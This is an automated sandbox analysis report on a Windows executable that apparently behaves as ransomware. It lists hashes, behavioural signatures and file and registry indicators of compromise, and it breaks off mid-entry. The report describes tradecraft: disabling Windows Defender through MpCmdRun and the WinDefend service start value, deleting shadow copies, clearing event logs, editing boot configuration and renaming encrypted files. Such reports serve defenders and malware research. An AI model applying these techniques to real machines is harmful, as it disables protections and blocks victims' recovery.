Analysis
-
max time kernel
106s -
max time network
15s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-01-2022 13:26
Static task
static1
Behavioral task
behavioral1
Sample
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
Resource
win10-en-20211208
General
-
Target
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
-
Size
3.7MB
-
MD5
ed582a5d8711beaddf0e78f115caca61
-
SHA1
bfd3d499cdb1d43d1647f09d481795ee022f944e
-
SHA256
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687
-
SHA512
b43813d220a2f6ec38ec6d301d39e65c5e38517d8d6ea76589833dd58d38bcf40204ce042a6c2b38e248408dbde8560aba33556c5801ea2fa88defe6c76274f3
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1116 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 588 bcdedit.exe 532 bcdedit.exe -
Loads dropped DLL 15 IoCs
Processes:
WINWORD.EXESetup.exeSetup.exeMsiExec.exepid process 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE 2600 Setup.exe 2600 Setup.exe 2716 Setup.exe 2716 Setup.exe 2820 MsiExec.exe 2820 MsiExec.exe 2820 MsiExec.exe 2820 MsiExec.exe 2820 MsiExec.exe 2820 MsiExec.exe 2820 MsiExec.exe 2820 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WINWORD.EXEmsiexec.exedescription ioc process File opened (read-only) \??\I: WINWORD.EXE File opened (read-only) \??\J: WINWORD.EXE File opened (read-only) \??\O: WINWORD.EXE File opened (read-only) \??\U: WINWORD.EXE File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: WINWORD.EXE File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: WINWORD.EXE File opened (read-only) \??\B: WINWORD.EXE File opened (read-only) \??\E: WINWORD.EXE File opened (read-only) \??\K: WINWORD.EXE File opened (read-only) \??\M: WINWORD.EXE File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: WINWORD.EXE File opened (read-only) \??\H: WINWORD.EXE File opened (read-only) \??\V: WINWORD.EXE File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: WINWORD.EXE File opened (read-only) \??\X: WINWORD.EXE File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Q: WINWORD.EXE File opened (read-only) \??\T: WINWORD.EXE File opened (read-only) \??\W: WINWORD.EXE File opened (read-only) \??\Z: WINWORD.EXE File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: WINWORD.EXE File opened (read-only) \??\Y: WINWORD.EXE File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: WINWORD.EXE File opened (read-only) \??\R: WINWORD.EXE File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: WINWORD.EXE -
Drops file in Program Files directory 64 IoCs
Processes:
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exedescription ioc process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14791_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CASHREG.WAV.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\ja-JP\PurblePlace.exe.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21295_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tabskb.dll.mui df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\en-US\PurblePlace.exe.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Flyout_Thumbnail_Shadow.png df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Couture.eftx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0234131.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_SelectionSubpicture.png df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jre7\release.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_settings.png df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\UrbanPhotoAlbum.potx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\7-Zip\descript.ion.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105238.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00792_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03241_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_OFF.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21518_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgRes.dll.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe -
Drops file in Windows directory 11 IoCs
Processes:
msiexec.exeWINWORD.EXEdescription ioc process File opened for modification C:\Windows\Installer\MSI79F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7A41.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7AFE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7B5C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7BBB.tmp msiexec.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE File opened for modification C:\Windows\Installer\f7777a0.mst msiexec.exe File opened for modification C:\Windows\Installer\MSI7A70.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7BDB.tmp msiexec.exe File created C:\Windows\Installer\f7777a0.mst msiexec.exe File opened for modification C:\Windows\Installer\MSI78F7.tmp msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1196 vssadmin.exe -
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) 